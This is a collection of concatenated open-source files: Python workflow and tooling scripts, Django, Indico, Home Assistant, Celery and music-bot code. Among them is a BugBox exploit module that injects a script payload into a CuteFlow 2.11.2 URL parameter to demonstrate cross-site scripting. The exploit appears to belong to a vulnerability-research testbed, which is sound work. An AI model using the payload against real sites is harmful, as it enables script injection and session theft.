>>> options, args = enclosed_workflow.parseArgs()
>>> w = enclosed_workflow(options, args) #doctest: +ELLIPSIS
"""
def _initializeOptions(self):
super(enclosed_workflow, self)._initializeOptions()
# Force workdir to be 'skip' as we do not want to create
# A job directory for this script. Alse, we set dryRun and
# cleanup to false, as this workflow does not use any
# directories. Everything is done iin the memory.
# Moreover, we set cpuNo to 1 as it does not matter :)
self.options.workdir = self._DO_NOT_CREATE_WORKDIR
self.options.dryRun = False
self.options.cleanup = False
self.options.cpuNo = 1
if __name__ == 'possum.pos_wrapper_skel':
import doctest
doctest.testmod()
|
{
"content_hash": "9beebc2de36ceadf4aa434d831382a3c",
"timestamp": "",
"source": "github",
"line_count": 582,
"max_line_length": 164,
"avg_line_length": 43.1426116838488,
"alnum_prop": 0.6473376080289935,
"repo_name": "chrisfilo/poSSum",
"id": "af6eb386a825b147f642e4b784243a0b8639b9ed",
"size": "25152",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "possum/pos_wrapper_skel.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "7378"
},
{
"name": "Python",
"bytes": "469293"
},
{
"name": "Shell",
"bytes": "71781"
}
],
"symlink_target": ""
}
|
import os
import os.path
import string
paRootDirectory = '../../'
paHtmlDocDirectory = os.path.join( paRootDirectory, "doc", "html" )
## Script to check documentation status
## this script assumes that html doxygen documentation has been generated
##
## it then walks the entire portaudio source tree and check that
## - every source file (.c,.h,.cpp) has a doxygen comment block containing
## - a @file directive
## - a @brief directive
## - a @ingroup directive
## - it also checks that a corresponding html documentation file has been generated.
##
## This can be used as a first-level check to make sure the documentation is in order.
##
## The idea is to get a list of which files are missing doxygen documentation.
##
## How to run:
## $ cd doc/utils
## $ python checkfiledocs.py
def oneOf_a_in_b(a, b):
for x in a:
if x in b:
return True
return False
# recurse from top and return a list of all with the given
# extensions. ignore .svn directories. return absolute paths
def recursiveFindFiles( top, extensions, dirBlacklist, includePaths ):
result = []
for (dirpath, dirnames, filenames) in os.walk(top):
if not oneOf_a_in_b(dirBlacklist, dirpath):
for f in filenames:
if os.path.splitext(f)[1] in extensions:
if includePaths:
result.append( os.path.abspath( os.path.join( dirpath, f ) ) )
else:
result.append( f )
return result
# generate the html file name that doxygen would use for
# a particular source file. this is a brittle conversion
# which i worked out by trial and error
def doxygenHtmlDocFileName( sourceFile ):
return sourceFile.replace( '_', '__' ).replace( '.', '_8' ) + '.html'
sourceFiles = recursiveFindFiles( os.path.join(paRootDirectory,'src'), [ '.c', '.h', '.cpp' ], ['.svn', 'mingw-include'], True );
sourceFiles += recursiveFindFiles( os.path.join(paRootDirectory,'include'), [ '.c', '.h', '.cpp' ], ['.svn'], True );
docFiles = recursiveFindFiles( paHtmlDocDirectory, [ '.html' ], ['.svn'], False );
currentFile = ""
def printError( f, message ):
global currentFile
if f != currentFile:
currentFile = f
print f, ":"
print "\t!", message
for f in sourceFiles:
if not doxygenHtmlDocFileName( os.path.basename(f) ) in docFiles:
printError( f, "no doxygen generated doc page" )
s = file( f, 'rt' ).read()
if not '/**' in s:
printError( f, "no doxygen /** block" )
if not '@file' in s:
printError( f, "no doxygen @file tag" )
if not '@brief' in s:
printError( f, "no doxygen @brief tag" )
if not '@ingroup' in s:
printError( f, "no doxygen @ingroup tag" )
|
{
"content_hash": "51c9d110918424aa7ff521e5f0b9f5af",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 129,
"avg_line_length": 32.05747126436781,
"alnum_prop": 0.627465041233417,
"repo_name": "powerboat9/USTL",
"id": "5d6b58518f7c97eed0e37c9a08fbcf14b3377f89",
"size": "2789",
"binary": false,
"copies": "55",
"ref": "refs/heads/master",
"path": "src/portaudio/doc/utils/checkfiledocs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "844"
},
{
"name": "C",
"bytes": "3021601"
},
{
"name": "C++",
"bytes": "694845"
},
{
"name": "CMake",
"bytes": "23016"
},
{
"name": "HTML",
"bytes": "3941"
},
{
"name": "Java",
"bytes": "43276"
},
{
"name": "M4",
"bytes": "7535"
},
{
"name": "Makefile",
"bytes": "130739"
},
{
"name": "Python",
"bytes": "27318"
},
{
"name": "Shell",
"bytes": "334567"
}
],
"symlink_target": ""
}
|
from django.shortcuts import render
# =========================================================================
# Renders about.html page
# =========================================================================
def about(request):
return render(request, "about.html", {})
|
{
"content_hash": "a76c484318ddb6febffb281a2e9b3c9f",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 75,
"avg_line_length": 35.125,
"alnum_prop": 0.33451957295373663,
"repo_name": "brittdawn/django-webstore",
"id": "9121cb38e4c27122f7ded99e36f440a432d76f3f",
"size": "281",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "webstore/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "333244"
},
{
"name": "HTML",
"bytes": "20808"
},
{
"name": "JavaScript",
"bytes": "527034"
},
{
"name": "Python",
"bytes": "48144"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ldpoznan.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "8a0b619e5962336bb91962a26140f44d",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 72,
"avg_line_length": 25.444444444444443,
"alnum_prop": 0.7117903930131004,
"repo_name": "esenti/ld-poznan",
"id": "e58587cb4c68216f5d1ed7f7988cc9f14e751983",
"size": "251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ldpoznan/manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1970"
},
{
"name": "HTML",
"bytes": "4077"
},
{
"name": "Python",
"bytes": "11012"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from indico.core.db import db
from indico.core.db.sqlalchemy import PyIntEnum
from indico.modules.events.editing.models.editable import EditableType
from indico.util.string import format_repr, return_ascii
class EditingReviewCondition(db.Model):
__tablename__ = 'review_conditions'
__table_args__ = {'schema': 'event_editing'}
id = db.Column(
db.Integer,
primary_key=True
)
type = db.Column(
PyIntEnum(EditableType),
nullable=False
)
event_id = db.Column(
db.Integer,
db.ForeignKey('events.events.id'),
index=True,
nullable=False
)
event = db.relationship(
'Event',
lazy=True,
backref=db.backref(
'editing_review_conditions',
cascade='all, delete-orphan',
lazy=True
)
)
file_types = db.relationship(
'EditingFileType',
secondary='event_editing.review_condition_file_types',
collection_class=set,
lazy=False,
backref=db.backref(
'review_conditions',
collection_class=set,
lazy=True
)
)
# relationship backrefs:
# - file_types (EditingFileType.review_conditions)
@return_ascii
def __repr__(self):
return format_repr(self, 'id', 'event_id')
db.Table(
'review_condition_file_types',
db.metadata,
db.Column(
'review_condition_id',
db.ForeignKey('event_editing.review_conditions.id'),
primary_key=True,
autoincrement=False,
index=True
),
db.Column(
'file_type_id',
db.ForeignKey('event_editing.file_types.id'),
primary_key=True,
autoincrement=False,
index=True
),
schema='event_editing'
)
|
{
"content_hash": "ab0c2f12e188a2bdfc63b280a81438e1",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 70,
"avg_line_length": 24.373333333333335,
"alnum_prop": 0.5924507658643327,
"repo_name": "mic4ael/indico",
"id": "8201095087f50a37b0def3198e1c4348cd0199ca",
"size": "2042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "indico/modules/events/editing/models/review_conditions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "553825"
},
{
"name": "HTML",
"bytes": "1375160"
},
{
"name": "JavaScript",
"bytes": "1852830"
},
{
"name": "Mako",
"bytes": "1340"
},
{
"name": "Python",
"bytes": "4612709"
},
{
"name": "Shell",
"bytes": "2665"
},
{
"name": "TeX",
"bytes": "23292"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
}
|
"""threaded module."""
# Standard Library
import typing
# Local Implementation
from ._asynciotask import AsyncIOTask
from ._asynciotask import asynciotask
from ._threaded import Threaded
from ._threaded import threaded
from ._threadpooled import ThreadPooled
from ._threadpooled import threadpooled
try:
# Local Implementation
from ._version import version as __version__
except ImportError:
pass
__all__ = (
"ThreadPooled",
"Threaded",
"threadpooled",
"threaded",
"AsyncIOTask",
"asynciotask",
) # type: typing.Tuple[str, ...]
__author__ = "Alexey Stepanov"
__author_email__ = "penguinolog@gmail.com"
__maintainers__ = {
"Alexey Stepanov": "penguinolog@gmail.com",
"Antonio Esposito": "esposito.cloud@gmail.com",
"Dennis Dmitriev": "dis-xcom@gmail.com",
}
__url__ = "https://github.com/python-useful-helpers/threaded"
__description__ = "Decorators for running functions in Thread/ThreadPool/IOLoop"
__license__ = "Apache License, Version 2.0"
|
{
"content_hash": "60b06172bdca33819b0c82f9819b7279",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 80,
"avg_line_length": 26.263157894736842,
"alnum_prop": 0.7004008016032064,
"repo_name": "penguinolog/threaded",
"id": "eac6f39a0fabc07463ab0dcd8f70d41207a71cfd",
"size": "1633",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "threaded/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "973"
},
{
"name": "Python",
"bytes": "67156"
},
{
"name": "Shell",
"bytes": "2607"
}
],
"symlink_target": ""
}
|
""" test_comments.py """
import datetime
from unittest import TestCase
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import Site
from mockito import mock, when
from marimo_comments import constants
from marimo_comments.models import MarimoCommentBucket, MarimoComment
class MarimoCommentTest(TestCase):
def setUp(self):
self.user_data = {
'pk': 1,
'username': 'bharo',
'email': 'bob@haro.com',
}
self.user = User(**self.user_data)
self.site = Site(pk=1, name='foo', domain='www.foo.com')
self.datetime = datetime.datetime(2010, 12, 13, 10, 15, 0)
self.flatpage = FlatPage(pk=1, title='test', content='my entry blah blah blah')
self.test_content_type = ContentType(pk=101, name='Entry', app_label='example', model='entry')
self.bucket = MarimoCommentBucket(pk=1, content_type=self.test_content_type,
object_id=self.flatpage.pk, originating_site=self.site)
self.comment = MarimoComment(pk=1, text='Test Comment', bucket=self.bucket, user=self.user,
submit_date=self.datetime)
def test_comment_userinfo(self):
assert self.comment.userinfo['name'] == self.user_data['username']
def test_comment_userinfo_email(self):
assert self.comment.userinfo['email'] == self.user_data['email']
assert self.comment.email == self.user_data['email']
def test_comment_userinfo_with_first_last(self):
self.user.first_name = 'Bob'
self.user.last_name = 'Haro'
assert self.comment.userinfo['name'] == 'Bob Haro'
assert self.comment.name == 'Bob Haro'
def test_get_page_number_under_page_limit(self):
mock_query_set = mock()
when(MarimoComment.objects).filter(bucket=self.bucket, submit_date__lt=self.datetime).thenReturn(mock_query_set)
when(mock_query_set).count().thenReturn(constants.COMMENTS_PER_PAGE - 1)
assert self.comment.get_page_number() == 1
def test_get_page_number_over_page_limit(self):
mock_query_set = mock()
when(MarimoComment.objects).filter(bucket=self.bucket, submit_date__lt=self.datetime).thenReturn(mock_query_set)
when(mock_query_set).count().thenReturn(constants.COMMENTS_PER_PAGE)
assert self.comment.get_page_number() == 2
def test_comment_get_absolute_url(self):
when(ContentType.objects).get(id=101).thenReturn(self.test_content_type)
when(ContentType).get_object_for_this_type().thenReturn(self.flatpage)
assert '#/comment/p1/c1/' == self.comment.get_absolute_url()
|
{
"content_hash": "0dfdb58014708dc048c14efa76073b24",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 120,
"avg_line_length": 43.578125,
"alnum_prop": 0.6629616349946217,
"repo_name": "brandonivey/marimo-comments",
"id": "7f1caffb51cf8afcfa608e4e39a67675eabd3dc5",
"size": "2789",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "marimo_comments/tests/test_comments.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31938"
}
],
"symlink_target": ""
}
|
"""myapp.py
Usage:
(window1)$ python myapp.py -l info
(window2)$ python
>>> from myapp import add
>>> add.delay(16, 16).get()
32
You can also specify the app to use with celeryd::
$ celeryd -l info --app=myapp.celery
"""
from celery import Celery
celery = Celery("myapp")
celery.conf.update(BROKER_HOST="localhost")
@celery.task
def add(x, y):
return x + y
if __name__ == "__main__":
celery.worker_main()
|
{
"content_hash": "7b0d916df37d1b060481afe31e2cce35",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 50,
"avg_line_length": 14.8,
"alnum_prop": 0.6216216216216216,
"repo_name": "frac/celery",
"id": "40ca6b5e8e72baf09b6e05328641c72301621c2e",
"size": "444",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/app/myapp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "975783"
},
{
"name": "Shell",
"bytes": "30099"
}
],
"symlink_target": ""
}
|
"""Support for Nest sensors that dispatches between API versions."""
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.typing import HomeAssistantType
from .const import DATA_SDM
from .sensor_legacy import async_setup_legacy_entry
from .sensor_sdm import async_setup_sdm_entry
async def async_setup_entry(
hass: HomeAssistantType, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up the sensors."""
if DATA_SDM not in entry.data:
await async_setup_legacy_entry(hass, entry, async_add_entities)
return
await async_setup_sdm_entry(hass, entry, async_add_entities)
|
{
"content_hash": "66113faf40cd4893f252299bcf91e691",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 71,
"avg_line_length": 33.526315789473685,
"alnum_prop": 0.750392464678179,
"repo_name": "soldag/home-assistant",
"id": "6245c5d83d02f5323fc8039fe8efd6b4ae764d61",
"size": "637",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/nest/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19025087"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
"""Integration to UniFi Network and its various features."""
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import callback
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.device_registry import CONNECTION_NETWORK_MAC
from .const import (
ATTR_MANUFACTURER,
CONF_CONTROLLER,
DOMAIN as UNIFI_DOMAIN,
LOGGER,
UNIFI_WIRELESS_CLIENTS,
)
from .controller import UniFiController
from .services import async_setup_services, async_unload_services
SAVE_DELAY = 10
STORAGE_KEY = "unifi_data"
STORAGE_VERSION = 1
async def async_setup(hass, config):
"""Integration doesn't support configuration through configuration.yaml."""
hass.data[UNIFI_WIRELESS_CLIENTS] = wireless_clients = UnifiWirelessClients(hass)
await wireless_clients.async_load()
return True
async def async_setup_entry(hass, config_entry):
"""Set up the UniFi Network integration."""
hass.data.setdefault(UNIFI_DOMAIN, {})
# Flat configuration was introduced with 2021.3
await async_flatten_entry_data(hass, config_entry)
controller = UniFiController(hass, config_entry)
if not await controller.async_setup():
return False
# Unique ID was introduced with 2021.3
if config_entry.unique_id is None:
hass.config_entries.async_update_entry(
config_entry, unique_id=controller.site_id
)
if not hass.data[UNIFI_DOMAIN]:
async_setup_services(hass)
hass.data[UNIFI_DOMAIN][config_entry.entry_id] = controller
config_entry.async_on_unload(
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, controller.shutdown)
)
LOGGER.debug("UniFi Network config options %s", config_entry.options)
if controller.mac is None:
return True
device_registry = dr.async_get(hass)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
configuration_url=controller.api.url,
connections={(CONNECTION_NETWORK_MAC, controller.mac)},
default_manufacturer=ATTR_MANUFACTURER,
default_model="UniFi Network",
default_name="UniFi Network",
)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a config entry."""
controller = hass.data[UNIFI_DOMAIN].pop(config_entry.entry_id)
if not hass.data[UNIFI_DOMAIN]:
async_unload_services(hass)
return await controller.async_reset()
async def async_flatten_entry_data(hass, config_entry):
"""Simpler configuration structure for entry data.
Keep controller key layer in case user rollbacks.
"""
data: dict = {**config_entry.data, **config_entry.data[CONF_CONTROLLER]}
if config_entry.data != data:
hass.config_entries.async_update_entry(config_entry, data=data)
class UnifiWirelessClients:
"""Class to store clients known to be wireless.
This is needed since wireless devices going offline might get marked as wired by UniFi.
"""
def __init__(self, hass):
"""Set up client storage."""
self.hass = hass
self.data = {}
self._store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
async def async_load(self):
"""Load data from file."""
if (data := await self._store.async_load()) is not None:
self.data = data
@callback
def get_data(self, config_entry):
"""Get data related to a specific controller."""
data = self.data.get(config_entry.entry_id, {"wireless_devices": []})
return set(data["wireless_devices"])
@callback
def update_data(self, data, config_entry):
"""Update data and schedule to save to file."""
self.data[config_entry.entry_id] = {"wireless_devices": list(data)}
self._store.async_delay_save(self._data_to_save, SAVE_DELAY)
@callback
def _data_to_save(self):
"""Return data of UniFi wireless clients to store in a file."""
return self.data
|
{
"content_hash": "aed13d9aa0189bdb3e918019d1323b82",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 91,
"avg_line_length": 31.496062992125985,
"alnum_prop": 0.68275,
"repo_name": "jawilson/home-assistant",
"id": "180f1d6752f871055f535b6eccf4b6338c144942",
"size": "4000",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "homeassistant/components/unifi/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
import os
import glob
import click
from .settings import LOCAL_CONFIG, load_config
from .git import BranchGetter
from .utils import taskstatus
def get_issue(lancet, issue_id=None):
with taskstatus("Looking up issue on the issue tracker") as ts:
project_id = lancet.config.get("tracker", "project_id")
if issue_id is None:
name_getter = lancet.get_instance_from_config(
"repository", "branch_name_getter", lancet
)
issue_id = name_getter.get_issue_key(lancet.repo.head.name)
issue = lancet.tracker.get_issue(project_id, issue_id)
summary = issue.summary
if len(summary) > 40:
summary = summary[:40] + "..."
ts.ok("Retrieved issue {}: {}".format(issue.id, summary))
return issue
def get_transition(ctx, lancet, issue, to_status):
current_status = issue.status
if current_status != to_status:
transitions = issue.get_transitions(to_status)
if not transitions:
click.secho(
'No transition from "{}" to "{}" found, aborting.'.format(
current_status, to_status
),
fg="red",
bold=True,
)
ctx.exit(1)
elif len(transitions) > 1:
click.secho(
'Multiple transitions found from "{}" to "{}", aborting.'.format(
current_status, to_status
),
fg="red",
bold=True,
)
ctx.exit(1)
else:
transition_id = transitions[0]
else:
transition_id = None
return transition_id
def set_issue_status(lancet, issue, to_status, transition):
with taskstatus('Setting issue status to "{}"'.format(to_status)) as ts:
if transition is not None:
issue.apply_transition(transition)
ts.ok('Issue status set to "{}"'.format(to_status))
else:
ts.ok('Issue already "{}"'.format(to_status))
def create_issue(
lancet, summary, *, project_id=None, add_to_active_sprint=False
):
with taskstatus("Creating issue") as ts:
if project_id is None:
project_id = lancet.config.get("tracker", "project_id")
issue = lancet.tracker.create_issue(
project_id=project_id,
summary=summary,
add_to_active_sprint=add_to_active_sprint,
)
ts.ok(f"Created issue {issue.id}: {issue.link}")
return issue
def assign_issue(lancet, issue, username, active_status):
with taskstatus(f"Assigning issue to {username}") as ts:
if not issue.assignees or username not in issue.assignees:
if issue.status == active_status:
ts.abort(
f"Issue already active and not assigned to {username}"
)
else:
issue.assign_to(username)
ts.ok(f"Issue assigned to {username}")
else:
ts.ok(f"Issue already assigned to {username}")
def assign_pull_request(lancet, pr, username):
with taskstatus(f"Assigning pull request to {username}") as ts:
if not pr.assignees or username not in pr.assignees:
pr.assign_to(username)
ts.ok(f"Pull request assigned to {username}")
else:
ts.ok(f"Pull request already assigned to {username}")
def get_branch(lancet, issue, base_branch=None, create=True):
if not base_branch:
base_branch = lancet.config.get("repository", "base_branch")
remote_name = lancet.config.get("repository", "remote_name")
name_getter = lancet.get_instance_from_config(
"repository", "branch_name_getter", lancet
)
branch_getter = BranchGetter(base_branch, name_getter, remote_name)
return branch_getter(lancet.repo, issue, create=create)
def get_project_keys(lancet):
workspace = os.path.expanduser(lancet.config.get("lancet", "workspace"))
config_files = glob.glob(os.path.join(workspace, "*", LOCAL_CONFIG))
for path in config_files:
config = load_config(path)
key = config.get("tracker", "default_project", fallback=None)
if key:
yield key, os.path.dirname(path)
def get_project_dirs(lancet):
workspace = os.path.expanduser(lancet.config.get("lancet", "workspace"))
for path in glob.glob(os.path.join(workspace, "*", ".lancet")):
path = os.path.dirname(path)
yield os.path.basename(path), path
|
{
"content_hash": "9cbf40cda7b7f2e405667f175b4ea36a",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 81,
"avg_line_length": 34.458015267175576,
"alnum_prop": 0.5930438635356668,
"repo_name": "GaretJax/lancet",
"id": "cf2848f4968694048877c7105be020da0e58357f",
"size": "4514",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lancet/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "81691"
},
{
"name": "Shell",
"bytes": "998"
}
],
"symlink_target": ""
}
|
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0022",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/edittemplate_step1.php?templateid=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
|
{
"content_hash": "cf4a3028ffb3ea009b36fc0241108f79",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 134,
"avg_line_length": 29.717391304347824,
"alnum_prop": 0.5581565471836137,
"repo_name": "UMD-SEAM/bugbox",
"id": "8489fa66c932313146c7adc8f5ee345fe8a4db3e",
"size": "1539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "framework/Exploits/CUTEFLOW_0022.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "33053"
},
{
"name": "CSS",
"bytes": "3304865"
},
{
"name": "Elixir",
"bytes": "5199"
},
{
"name": "Java",
"bytes": "22054"
},
{
"name": "JavaScript",
"bytes": "5143660"
},
{
"name": "PHP",
"bytes": "47086650"
},
{
"name": "Perl",
"bytes": "5111"
},
{
"name": "Python",
"bytes": "228074"
},
{
"name": "Ruby",
"bytes": "15397"
},
{
"name": "Shell",
"bytes": "126456"
},
{
"name": "XSLT",
"bytes": "345743"
}
],
"symlink_target": ""
}
|
import os
import re
import asyncio
import logging
import traceback
from enum import Enum
from .constructs import Serializable
from .exceptions import ExtractionError
from .utils import get_header, md5sum
LOG = logging.getLogger(__name__)
class EntryTypes(Enum):
""" TODO """
URL = 1
STEAM = 2
FILE = 3
def __str__(self):
return self.name
class BasePlaylistEntry(Serializable):
""" TODO """
def __init__(self):
self.filename = None
self.filename_thumbnail = None
self._is_downloading = False
self._waiting_futures = []
@property
def is_downloaded(self):
""" TODO """
if self._is_downloading:
return False
return bool(self.filename)
async def _download(self):
raise NotImplementedError
def get_ready_future(self):
"""
Returns a future that will fire when the song is ready to be played.
The future will either fire with the result (being the entry)
or an exception as to why the song download failed.
"""
future = asyncio.Future()
if self.is_downloaded:
# In the event that we're downloaded, we're already ready for
# playback.
future.set_result(self)
else:
# If we request a ready future, let's ensure that it'll actually
# resolve at one point.
asyncio.ensure_future(self._download())
self._waiting_futures.append(future)
return future
def _for_each_future(self, callback):
"""
Calls `callback` for each future that is not cancelled.
Absorbs and logs any errors that may have occurred.
"""
futures = self._waiting_futures
self._waiting_futures = []
for future in futures:
if future.cancelled():
continue
try:
callback(future)
except:
traceback.print_exc()
def __eq__(self, other):
return self is other
def __hash__(self):
return id(self)
class URLPlaylistEntry(BasePlaylistEntry):
""" TODO """
def __init__(self,
playlist,
url,
title,
duration=0,
start_seconds=0,
expected_filename=None,
filename_thumbnail=None,
**meta):
super().__init__()
self.playlist = playlist
self.url = url
self.title = title
self.duration = duration
self.start_seconds = start_seconds
self.expected_filename = expected_filename
self.filename_thumbnail = filename_thumbnail
self.meta = meta
self.download_folder = self.playlist.downloader.download_folder
def __json__(self):
return self._enclose_json({
'version': 2,
'url': self.url,
'title': self.title,
'duration': self.duration,
'start_seconds': self.start_seconds,
'downloaded': self.is_downloaded,
'expected_filename': self.expected_filename,
'filename': self.filename,
'filename_thumbnail': self.filename_thumbnail,
'meta': {
name: {
'type': obj.__class__.__name__,
'id': obj.id,
'name': obj.name
} for name, obj in self.meta.items() if obj
}
})
@classmethod
def _deserialize(cls, data, playlist=None):
assert playlist is not None, cls._bad('playlist')
try:
# TODO: version check
url = data['url']
title = data['title']
duration = data['duration']
start_seconds = data['start_seconds']
downloaded = data['downloaded']
filename = data['filename'] if downloaded else None
expected_filename = data['expected_filename'] \
if downloaded else None
filename_thumbnail = data['filename_thumbnail'] \
if downloaded else None
meta = {}
# TODO: Better [name] fallbacks
if 'channel' in data['meta']:
meta['channel'] = playlist.bot.get_channel(
data['meta']['channel']['id'])
if 'author' in data['meta']:
meta['author'] = meta['channel'].server.get_member(
data['meta']['author']['id'])
entry = cls(playlist, url, title, duration, start_seconds,
expected_filename, filename_thumbnail, **meta)
entry.filename = filename
return entry
except Exception as error:
LOG.error('Could not load %s', cls.__name__, exc_info=error)
# noinspection PyTypeChecker
async def _download(self):
if self._is_downloading:
return
self._is_downloading = True
try:
# Ensure the folder that we're going to move into exists.
if not os.path.exists(self.download_folder):
os.makedirs(self.download_folder)
if self.expected_filename:
# self.expected_filename:
# audio_cache\youtube-9R8aSKwTEMg-NOMA_-_Brain_Power.m4a
extractor = os.path.basename(self.expected_filename).split('-')[0]
# if os.name == 'nt':
# extractor = (self.expected_filename.split('-')[0]).rsplit('\\', 1)[-1]
# else:
# extractor = (self.expected_filename.split('-')[0]).rsplit('/', 1)[-1]
# the generic extractor requires special handling
if extractor == 'generic':
LOG.debug('Handling generic')
# remove thumbnail images from list
img_pattern = re.compile(
r'(\.(jpg|jpeg|png|gif|bmp))$', flags=re.IGNORECASE)
flistdir = [f.rsplit('-', 1)[0] for f in
os.listdir(self.download_folder)
if not img_pattern.search(f)]
expected_fname_noex = os.path.basename(
self.expected_filename).rsplit('.', 1)
if expected_fname_noex in flistdir:
try:
rsize = int(await get_header(
self.playlist.bot.aiosession,
self.url, 'CONTENT-LENGTH'))
except:
rsize = 0
lfile = os.path.join(
self.download_folder,
os.listdir(self.download_folder)[
flistdir.index(expected_fname_noex)]
)
LOG.debug('Resolved %s to %s', self.expected_filename, lfile)
lsize = os.path.getsize(lfile)
LOG.debug('Remote size: %s Local size: %s', rsize, lsize)
if lsize != rsize:
await self._really_download(hash=True)
else:
LOG.debug('[Download] Cached: %s', self.url)
self.filename = lfile
else:
LOG.debug('File not found in cache (%s)', expected_fname_noex)
await self._really_download(hash=True)
else:
img_pattern = re.compile(
r'(\.(jpg|jpeg|png|gif|bmp))$', flags=re.IGNORECASE)
ldir = [f for f in os.listdir(
self.download_folder) if not img_pattern.search(f)]
flistdir = [f.rsplit('.', 1)[0] for f in ldir]
expected_fname_base = os.path.basename(self.expected_filename)
expected_fname_noex = expected_fname_base.rsplit('.', 1)[0]
# idk wtf this is but its probably legacy code
# or i have youtube to blame for changing shit again
if expected_fname_base in ldir:
self.filename = os.path.join(
self.download_folder, expected_fname_base)
img_pattern = re.compile(
r'({}\.(jpg|jpeg|png|gif|bmp))$'.format(
expected_fname_noex), flags=re.IGNORECASE)
self.filename_thumbnail = next(
os.path.join(self.download_folder, f)
for f in os.listdir(self.download_folder) if img_pattern.search(f))
LOG.info('Download cached: %s', self.url)
elif expected_fname_noex in flistdir:
LOG.info(
'Download cached (different extension): %s', self.url)
self.filename = os.path.join(
self.download_folder,
ldir[flistdir.index(expected_fname_noex)])
LOG.debug('Expected %s, got %s',
self.expected_filename.rsplit('.', 1)[-1],
self.filename.rsplit('.', 1)[-1]
)
else:
await self._really_download()
else:
# For cases where Config - SaveVideos = no and the bot resumes after a restart.
LOG.debug('Config - SaveVideos = no: Downloading the song again!')
await self._really_download()
# Trigger ready callbacks.
self._for_each_future(lambda future: future.set_result(self))
except Exception as error:
traceback.print_exc()
self._for_each_future(lambda future: future.set_exception(error))
finally:
self._is_downloading = False
# noinspection PyShadowingBuiltins
async def _really_download(self, *, hash=False):
LOG.info("Download started: '%s' \[%s\]" % (self.title, self.url))
try:
result = await self.playlist.downloader.extract_info(
self.playlist.loop, self.url, download=True)
except Exception as error:
raise ExtractionError(error)
LOG.info("Download complete: '%s' \[%s\]" % (self.title, self.url))
if result is None:
LOG.critical('YTDL has failed, everyone panic')
raise ExtractionError('ytdl broke and hell if I know why')
# What the fuck do I do now?
self.filename = unhashed_fname = \
self.playlist.downloader.ytdl.prepare_filename(result)
# Search for file name with an image suffix
img_pattern = re.compile(
r'({}\.(jpg|jpeg|png|gif|bmp))$'.format(
